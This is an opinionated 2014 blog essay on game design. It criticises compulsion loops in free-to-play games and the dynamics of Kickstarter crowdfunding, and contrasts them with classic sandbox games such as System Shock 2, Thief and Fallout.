If I were cynical, which I am, I would say a bunch of people have spent hundreds of dollars each on virtual assets with no guarantee they'll ever work as promised. This is the power of nostalgia mixed with in-engine mockups, and it's clearly very good business. Don't get me wrong, I've funded a few games on Kickstarter too, below retail. But what comes out of these projects is raising some eyebrows, with hype, delays and cancellations galore. I think it points to a deeper issue altogether, driven by games but not limited to gaming.

On the surface these developers are giving their fans exactly what they want. Something they already love, modernized and expanded, with early access and feedback. You cannot fault the creators for this. Rather, I think the problem is that gaming fans don't know what they want. It's a know it when I see it kind of affair. So they just ask for more of the same instead, again confusing form with function.

There's an elephant in the room. Everybody does it to some degree, but it's somehow shameful.

Compulsion.

It's even more obvious when you consider that the easy money in gaming isn't actually to bankroll a $200 million console blockbuster, half of which is probably marketing. Rather, it's to put a carefully tuned slot machine under the noses of as many people as possible, like say, a free-to-play smartphone game. With lots of push notifications and time locks, using fictional hooks to create personal investment and a sense of false scarcity. People pull their phones out in elevators and on the toilet, multiple times a day. It's guaranteed brain share if you get in, so much easier than convincing everyone to fork out $50 once, let alone monthly.

The real target audience is a small minority of whales, compulsive users, who buy the virtual currency and goods you mint at will. They subsidize the free users, who in turn provide word of mouth on social media. It's gambling and addiction, by any other name, only now people are betting real money against fake money, so it's legal.

Free to play

Most gamers are familiar with the "one more turn" itch of strategy or puzzle games, the desire to open every chest and read every log, the zombiefied stares at LAN parties. It's a common trope to be obsessive, but gamers are generally self-aware about it. We don't mind wasting time if it's fun, that's the point, and it gives the Youtubers something to do.

But the Skinner box is still real. Too often we see products that seem to consist mainly of compulsive triggers. Where the developers built a guided theme park ride with only the promise of cake at the end. They set out a generic progression tree and loom a nebulous threat overhead that can only be beaten by a fully armed and operational Level 80 Battlemage. Between you and the end stand a thousand foes and a bunch of fetch/build/shoot/escort quests. Everything will be perfectly scaled to offer the permanent illusion of a challenge you can barely win, and are constantly forced to work for.

I think this kind of game design stems from a fundamental misunderstanding, willful or not, of how games are supposed to work. It's cargo culting the patterns of games and game mechanics, without considering what they're for. Which is the point I'd like to get to.

But first, there's still the elephant.

Crowdfunding
Star Citizen
Double Fine Adventure Kickstarter
Double Fine Adventure

See, the way these shady free-to-play games work... if we're honest, it kinda matches how Kickstarter plays out. Dramatic concept art. A beloved NPC in need. An XP bar to fill. Stretch goals to level up. Massive online multiplayer with social media tie ins, rally your friends. Plus of course, unlimited alpha and beta testing until release, bankrolled by you, with additional paid perks along the way.

At the risk of stating the obvious, but it's more on point than ever: these things are run by game designers, for gamers. No, put away the tin foil hat. I simply want to suggest that what draws people into these projects bears little relation to what comes out at the end, a release which is merely a coda to a multi-year event. That it is no more about game development than Mario is about saving princesses. That maybe Kickstarter is a sequel to Twitter, the world's #1 video game.

It shows in the lack of polish and sophistication in the games that do manage a release, which reviewers and fans consistently gloss over or forgive. Yes I'm getting into taste territory here, but let's look at it objectively. Repetitive shoot em ups that merely consist of dice rolls and numbers going up. RPGs with fenced off wax-museum towns. Meticulously painted backdrops that belie the lack of depth. Or alternatively, pixel art and chiptunes.

Indies
Wasteland 2, Shadowrun Returns, Broken Age, Superbrothers: Sword & Sworcery EP

On the surface these games have all the trappings of the classic gaming age, remade in widescreen HD or quirky indie glory, but they lack lasting power once you stop playing. Far from evolving the real classics, of which there are admittedly not actually that many, we've regressed and turned them into caricatures of themselves, mistaking technical limitations for a lack of ambition.

The Carrot and the Stick

If at this point you think I'm wearing rose-tinted glasses so fabulous I'm farting rainbows, allow me to convince you otherwise. I'm not pretending that classic DOS or NES games with giant clunky controls were the height of interaction design, or that early 3D wasn't butt-ugly in retrospect. Features like hint systems and autosaves are nice. Rather, there's a reason people continue to cite the same few classics.

Fallout, Freespace, Outcast, Master of Orion, Rollercoaster Tycoon, System Shock, Thief and Torment are still high points in gaming, and it isn't because they were/weren't Art, or are/aren't crappy by modern standards.

To this day, each of those games presents an understandable, flexible sandbox. They offer you a world with consistent rules, letting you figure out the mechanics to face the game's challenges your way. You explore environments at your own pace, build at your leisure, and you're driven forward because you want to, not because you have to. Compulsion is a side-effect of existing motivations, which naturally result from actively participating in the game world.

Classics
Fallout, Outcast, Freespace 2, System Shock 2, Thief 2: The Metal Age

If I go through an airlock in System Shock 2, it's because I need what's on the other side of it, and I hope to return alive from it. The game presents a choice and then dares me to take it.

If I go through an airlock in Mass Effect 3, it closes permanently because everything looks the same and too many players got turned around in testing. There is never a reason to go back. The game presents a mistaken illusion of freedom and has to clamp down to fix it.

Corridor shooters with random chest high barriers, indestructible plot armor, keys hanging next to locks, breadcrumbed objective markers, one-way quick travel or chutes, rock-paper-scissors busywork, teleporting AI... these are all just symptoms of a broken game world, which needs dramatic patch jobs to make basic gameplay not fall apart. If a level designer locks a door with the Red Key, they're just putting a meaningless fetch quest in your path to keep you busy. If they put two elite guards and an alarm there instead, now you have the opportunity for improvisation and consequence. That can only happen when there's options beyond "Use Shotgun on Face" and you've been given space and time to get confident about it.

Instead, many games are explicitly structured in a linear, inflationary manner. What you do at level 50 is mostly the same as level 5, only now the numbers are 10× larger, and you shoot blue instead of green.

Classics
The Elder Scrolls IV: Oblivion

The role of game mechanics should not be the oppressive tyrant telling you to fetch and grind and be thankful for your crumbs of XP and DPS as the scenery blazes past. It should be an à-la-carte menu of options which is opened up for your benefit and at your direction. Slow enough that you can get familiar with each element in turn, but fast enough not to frustrate and limit. Unlockables and crafting should be a way to enable new abilities, not just busywork. Level ups should let you specialize in certain tactics, not just keep up with the Joneses who all bought new glass armor and plasma rifles overnight. Compulsion is just a stick, not the carrot.

Ironically I think it's the technical limitations of classic games that often played to their advantage and which modern remakes in particular are screwing up. The spartan graphics served to highlight the mechanics, instead of needing focus rings and prompts. The lack of voices and mocap forced the writing to carry the story. When you can't conjure up massive vistas at will, there's no point in making the player cross giant cities and wastelands. When the entire world is just isometric sprites, it's practical to let the player destroy all of them. For a while there was a really good match between the complexity of the game world and the way it was represented, and I don't think it's a coincidence that this window is where we find many beloved gaming classics.

What might now seem like broken mechanics often had significant effects on gameplay. An amnesiac guard that can't climb ladders has a similar effect as regenerating health: it makes it easier to run away. Except only one of those requires the player to learn their surroundings. Circle strafers had a surprising amount of non-linearity and involved much more acrobatics than FPSes today, and the passive AI of early RTSes acts similar to modern shooter enemies, which don't engage unless you've spotted them.

Classic games
Crusader: No Regret, Rollercoaster Tycoon, TIE Fighter, Carmageddon

Gaming is ultimately about forgetting the rules of reality and adopting a whole new set. Realism doesn't matter, whacky rules can be fun, as long as they're consistent and interact in interesting ways.

For modern games to evolve to match their now deceiving superstar looks, to move beyond progress bar quest and animated puppets with voice boxes, significant advances have to be made. We need real sandbox simulation, autonomous agents and language-capable AI, and it's not as easy to deliver as another sequel or reboot, mainstream or otherwise. It requires building a game that's meant to be played rather than just reacted to.

I just hope enough people remember what actually made the classics work.

21 Sep 2014 7:00am GMT

20 Sep 2014

Dieter Plaetinck: Graphite & Influxdb intermezzo: migrating old data and a more powerful carbon relay


read more

20 Sep 2014 7:18pm GMT